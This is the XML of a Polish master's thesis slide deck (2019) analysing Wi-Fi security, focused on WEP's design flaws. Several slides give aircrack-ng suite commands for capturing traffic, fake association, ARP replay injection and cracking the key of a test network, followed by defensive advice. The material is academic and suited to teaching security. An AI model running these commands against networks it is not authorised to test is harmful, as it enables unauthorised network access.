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6" r:id="rId5"/>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="278" r:id="rId8"/>
    <p:sldId id="277" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="279" r:id="rId11"/>
    <p:sldId id="280" r:id="rId12"/>
    <p:sldId id="281" r:id="rId13"/>
    <p:sldId id="282" r:id="rId14"/>
    <p:sldId id="275" r:id="rId15"/>
    <p:sldId id="283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47" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="113" d="100"/>
          <a:sy n="113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97512-D59D-4389-AB7A-0F2091AD8924}" type="datetimeFigureOut">
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:pPr/>
              <a:t>18.11.2019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4632" cy="3744415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Warszawska Wyższa Szkoła Informatyki</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="pl-PL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i="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Praca magisterska</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="pl-PL" sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="pl-PL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Analiza wybranych mechanizmów zabezpieczeń bezprzewodowych lokalnych sieci komputerowych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63888" y="6165304"/>
            <a:ext cx="2480320" cy="985664"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="pl-PL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Warszawa, 2019</a:t>
            </a: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611560" y="5085184"/>
            <a:ext cx="2880320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Promotor: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dr inż. Dariusz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Chaładyniak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6156176" y="5085184"/>
            <a:ext cx="2480320" cy="985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Wykonał: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Patryk Zembrzuski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Nr albumu 8616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E4B7AB-2BBC-4722-A60C-68A3DFAD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Fałszywa asocjacja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E56664-31D9-45BB-A808-DA26A8538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797225"/>
            <a:ext cx="8229600" cy="57606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airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng -c 11 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 5C:4C:A9:6B:EC:CD -w WEP-test mon0</a:t>
            </a:r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9B57DCB1-ADD6-4073-AA89-1A8C0572C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48880"/>
            <a:ext cx="7458075" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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6354B88B-5165-45A7-9EFE-EE977B6B4BF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="4327003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/>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>-ng -9 -e "WEP-test" -a 5C:4C:A9:6B:EC:CD mon0</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2200" dirty="0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D34AF64E-AADB-486C-856D-A047050DE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4848522"/>
            <a:ext cx="7067128" cy="174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66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E4B7AB-2BBC-4722-A60C-68A3DFAD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Wstrzykiwanie pakietów ARP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E56664-31D9-45BB-A808-DA26A8538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797225"/>
            <a:ext cx="8229600" cy="576064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aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng -1 0 -e "WEP-test" -a 5C:4C:A9:6B:EC:CD -h 90:f6:52:16:63:23 mon0</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/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6354B88B-5165-45A7-9EFE-EE977B6B4BF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="4327003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aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng -3 -b 5C:4C:A9:6B:EC:CD -h 90:f6:52:16:63:23 mon0</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="22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EA97F40-CBC2-45D5-9566-C395AF203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84" y="2369014"/>
            <a:ext cx="7934325" cy="131445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56739E4-29EB-47EE-8DC2-EABF327CF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2" y="4903067"/>
            <a:ext cx="85248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5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E4B7AB-2BBC-4722-A60C-68A3DFAD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Łamanie hasła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E56664-31D9-45BB-A808-DA26A8538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797225"/>
            <a:ext cx="8229600" cy="57606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aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng -s -b 5C:4C:A9:6B:EC:CD WEP-test*.cap</a:t>
            </a:r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BACDDD28-056E-43D9-9D0F-41B0926F5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" y="2276872"/>
            <a:ext cx="8825396" cy="313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94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E4B7AB-2BBC-4722-A60C-68A3DFAD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Łamanie hasła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E56664-31D9-45BB-A808-DA26A8538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797225"/>
            <a:ext cx="8229600" cy="57606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aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng -s -b 5C:4C:A9:6B:EC:CD WEP-test*.cap</a:t>
            </a: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CD80B11-0DED-47F8-950E-68581874B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87" y="1628800"/>
            <a:ext cx="8722025" cy="451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08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9024" y="1484784"/>
            <a:ext cx="8784976" cy="6840760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Używanie silnego hasła - Upewnijmy się, że hasło chroniące sieć Wi-Fi jest długie i przypadkowe, aby nie mogło zostać złamane przez doświadczonego hakera.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Sprawdzenie, czy nie ma fałszywych punktów dostępu (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Rogue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hotspot) - Fałszywe punkty dostępowe stanowią ogromne zagrożenie dla bezpieczeństwa. Mogły zostać utworzone przez pracowników (być może dlatego, że nie mogą uzyskać dobrego sygnału Wi-Fi w biurze) lub przez hakerów, którzy weszli do budynku i potajemnie połączyli swój sprzęt do dostępnego gniazda Ethernet.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Zapewnienie oddzielnej sieci dla gości - Jeśli chcemy, aby goście mogli korzystać z sieci Wi-Fi, rozsądnie jest zaoferować wydzieloną sieć. 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Ukrywanie nazwy sieci - Punkty dostępu do sieci Wi-Fi są zazwyczaj domyślnie skonfigurowane tak, aby nadawały nazwę sieci bezprzewodowej - znaną jako SSID – identyfikator ułatwiający ich wyszukiwanie. Ale identyfikator SSID może być również ustawiony na „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hidden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”, przez co tylko użytkownik znający SSID jest w stanie połączyć się z siecią.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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9024" y="1484784"/>
            <a:ext cx="8784976" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Używanie zapory sieciowej firewall - Firewalle sprzętowe stanowią pierwszą linię obrony przed atakami spoza sieci, a większość routerów posiada wbudowane firewalle, które sprawdzają dane przychodzące i wychodzące oraz blokują wszelkie podejrzane działania. Urządzenia są zazwyczaj ustawiane z rozsądnymi ustawieniami domyślnymi.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Włączenie autoryzacji adresów MAC dla użytkowników - każde urządzenie bezprzewodowe posiada unikalny numer seryjny znany jako adres MAC, a uwierzytelnianie MAC umożliwia dostęp do sieci tylko z zestawu adresów zdefiniowanych przez administratora. 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Używanie sieci VPN - VPN pomoże zachować bezpieczeństwo online, a przede wszystkim prywatność prywatnych danych.</a:t>
            </a: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96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Cel i zakres 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060849"/>
            <a:ext cx="8136904" cy="4104456"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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Cel pracy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr mar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Celem pracy było ukazanie charakterystyki sieci Wi-Fi, omówienie specyfikacji i jej zastosowanie, opis zagrożeń bezpieczeństwa, analizę protokołów zabezpieczających, popularne ataki, a także środki jakie można zastosować w sieci domowej i korporacyjnej.</a:t>
            </a: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Zakres pracy obejmował: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Analizę protokołów WEP, WPA, WPA2, WPA3, WPS,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Prezentację popularnych ataków (atak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Fluhrer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Mantin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Shamir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na WEP, KRACK na WPA2, potencjalne sposoby złamania zabezpieczeń protokołu WPA3)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Przegląd narzędzi używanych do łamania zabezpieczeń (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aircrack-ng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reaver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5716" y="188416"/>
            <a:ext cx="5112568" cy="1052736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Wstęp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852936"/>
            <a:ext cx="7956376" cy="4248472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Technologia sieci bezprzewodowych jest odpowiedzialna za rewolucję w mobilnym dostępie do sieci,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Niestety, wraz z ogromną wygodą, jaką stanowi łatwy i powszechny dostęp do Internetu oferowany przez sieci Wi-Fi, rośnie zagrożenie dla naszych danych, urządzeń czy sieci firmowych.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Sieci Wi-Fi rozwijane są od kilkunastu lat. Wraz z ich popularyzacją znacząco wzrastają wymagania dotyczące ich wydajności i przepustowości.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2A16B1C4-52A0-4846-B811-973FAD75A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713" y="-99392"/>
            <a:ext cx="3850287" cy="32307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5716" y="188416"/>
            <a:ext cx="5112568" cy="1052736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Wykaz wersji standardu Wi-Fi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462101E-F6A7-4E15-B15C-F5AFB3B347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547333"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="755577" y="1241152"/>
          <a:ext cx="7848874" cy="5255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530">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214536473"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1373530">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="987786339"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1856653">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="398927348"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1448432">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3908568773"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1796729">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2631633492"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="862559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Protokół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 dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Częstotliwość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Szerokość</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="pl-PL" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="pl-PL" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>kanału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MIMO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 dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Teoretyczna maksymalna przepustowość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882051924"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617571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802.11ax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2.4 or 5GHz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20, 40, 80, 160MHz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Multi User (MU-MIMO)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2.4 Gbps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706960630"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617571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802.11ac wave2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5 GHz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20, 40, 80, 160MHz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Multi User (MU-MIMO)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1.73 Gbps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97101553"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617571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802.11ac wave1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5 GHz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20, 40, 80MHz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Single User (SU-MIMO)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866.7 Mbps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944776950"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617571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802.11n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2.4 or 5 GHz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20, 40MHz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Single User (SU-MIMO)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450 Mbps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407280555"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="372584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802.11g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2.4 GHz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20 MHz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N/A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54 Mbps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883825940"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="372584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802.11a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5 GHz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20 MHz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N/A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54 Mbps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555507788"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="372584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802.11b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2.4 GHz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20 MHz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N/A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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>11 Mbps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37462126"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617571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 dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Legacy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pl-PL" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> 802.11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 dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2.4 GHz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 dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>20 MHz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 dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>N/A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pl-PL" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pl-PL" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Mbps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902553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38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Koncepcje zabezpieczania sieci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            Podstawowe metody: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Rozgłaszanie sieci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Filtrowanie dostępu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Izolacja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Szyfrowanie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Rozwiązania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enterprise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Utworzenie w pełni wyizolowanej od LAN, sieci Wi-Fi z otwartym dostępem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Zastosowanie infrastruktury bazującej na standardzie 802.1X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6077271"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Został wprowadzony w 1999 roku jako część oryginalnego standardu 802.11. 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Miało to na celu zapewnienie poufności na poziomie zbliżonym do sieci kablowych.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 standardzie używany jest szyfr strumieniowy RC4 dla zapewnienia poufności oraz suma kontrolna CRC-32 dla zapewnienia integralności. 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Szyfrowanie występuje w dwóch wersjach z różną długością klucza RC4: 64 i 128 bitów. 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 RC4 tekst jawny jest szyfrowany przy pomocy operacji XOR ze strumieniem klucza, tworząc szyfrogram.</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2000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889248" y="404664"/>
            <a:ext cx="7365504" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Wired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err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Equivalent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err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Privacy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6077271"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Jako szyfr symetryczny RC4 jest podatny na ataki polegające na analizie danych zaszyfrowanych tym samym kluczem, dlatego strumień klucza nie może się powtarzać.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Zdecydowano się na wprowadzenie zabezpieczenia kryptograficznego, polegającego na użyciu tzw. wektora inicjującego (IV), który jest 24-bitową liczbą, zmieniana dla każdego transmitowanego pakietu. Jest on konkatenowany wraz z kluczem podanym przez użytkownika (który jest stały), tworząc unikatowy dla każdego pakietu klucz algorytmu RC4.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Długość klucza użytkownika może wynosić 40 bitów (dla klucza RC4 o rozmiarze 64) lub 104 bity (dla klucza RC4 o rozmiarze 128).</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2000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889248" y="332656"/>
            <a:ext cx="7365504" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Wired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err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Equivalent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err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Privacy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6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6077271"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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 przypadku WEP wektor inicjujący (IV) miał zabezpieczać przed transmisją danych z użyciem tego samego klucza RC4.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Strona, która wysyła dane i wybiera IV, musi poinformować odbiorcę, jaka jest jego wartość, aby umożliwić odszyfrowanie danych.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Wektor IV musi być transmitowany w nieszyfrowanej części pakietu. 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Prawdopodobieństwo wystąpienia kolizji – polegającej na powtórzeniu się IV – wynosi 50% już po odebraniu 5000 pakietów.</a:t>
            </a:r>
          </a:p>
          <a:p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 przypadku powtórzenia się IV dane są szyfrowanie takim samym kluczem. Ze względu na fakt, że IV transmitowane jest w otwartej formie, można łatwo znaleźć odpowiednie pakiety z takim samym IV. </a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2000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889248" y="404664"/>
            <a:ext cx="7365504" cy="1143000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Podatności WEP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4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Scenariusz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676456" cy="5733256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Wybieramy sieć Wi-Fi do testowania, zbierając niezbędne informacje na jej temat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Rozpoczynamy przechwytywanie pakietów zawierających różne IV. Wymagane minimum do złamania hasła zabezpieczającego sieć z WEP-104 to ok. 40 tys. pakietów z IV. Należy jednak pamiętać że może być potrzebne zebranie większej ich liczby.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Jeśli ruch w sieci jest za mały, można próbować iniekcji pakietów, które spowodują wygenerowanie dodatkowych pakietów z nowym IV.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Klucz WEP zostaje złamany z wykorzystaniem tak zebranych pakietów.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Podłączenie się do sieci.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1106</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Pokaz na ekranie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Motyw pakietu Office</vt:lpstr>
      <vt:lpstr>Warszawska Wyższa Szkoła Informatyki  Praca magisterska   Analiza wybranych mechanizmów zabezpieczeń bezprzewodowych lokalnych sieci komputerowych</vt:lpstr>
      <vt:lpstr>Cel i zakres pracy</vt:lpstr>
      <vt:lpstr>Wstęp</vt:lpstr>
      <vt:lpstr>Wykaz wersji standardu Wi-Fi</vt:lpstr>
      <vt:lpstr>Koncepcje zabezpieczania sieci</vt:lpstr>
      <vt:lpstr>Wired Equivalent Privacy</vt:lpstr>
      <vt:lpstr>Wired Equivalent Privacy</vt:lpstr>
      <vt:lpstr>Podatności WEP</vt:lpstr>
      <vt:lpstr>Scenariusz</vt:lpstr>
      <vt:lpstr>Fałszywa asocjacja</vt:lpstr>
      <vt:lpstr>Wstrzykiwanie pakietów ARP</vt:lpstr>
      <vt:lpstr>Łamanie hasła</vt:lpstr>
      <vt:lpstr>Łamanie hasła</vt:lpstr>
      <vt:lpstr>Wnioski</vt:lpstr>
      <vt:lpstr>Wnioski</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager>dr inż. Dariusz Chaładyniak</Manager>
  <Company>Wyższa Szkoła Informatyki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Praca magisterska</dc:title>
  <dc:subject>Analiza wybranych mechanizmów zabezpieczeń bezprzewodowych lokalnych sieci komputerowych</dc:subject>
  <dc:creator>Patryk Zembrzuski</dc:creator>
  <cp:keywords>WWSI; WiFi; WPA; WPA2; WPA3; KRACK; Caffe Latte</cp:keywords>
  <dc:description>p_zembrzuski@pocztat.wwsi.edu.pl</dc:description>
  <cp:lastModifiedBy>Patryk Zembrzuski</cp:lastModifiedBy>
  <cp:revision>88</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-28T13:33:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-18T12:29:11Z</dcterms:modified>
  <cp:category>Praca magisterska</cp:category>
  <dc:language>Poilski</dc:language>
</cp:coreProperties>
</file>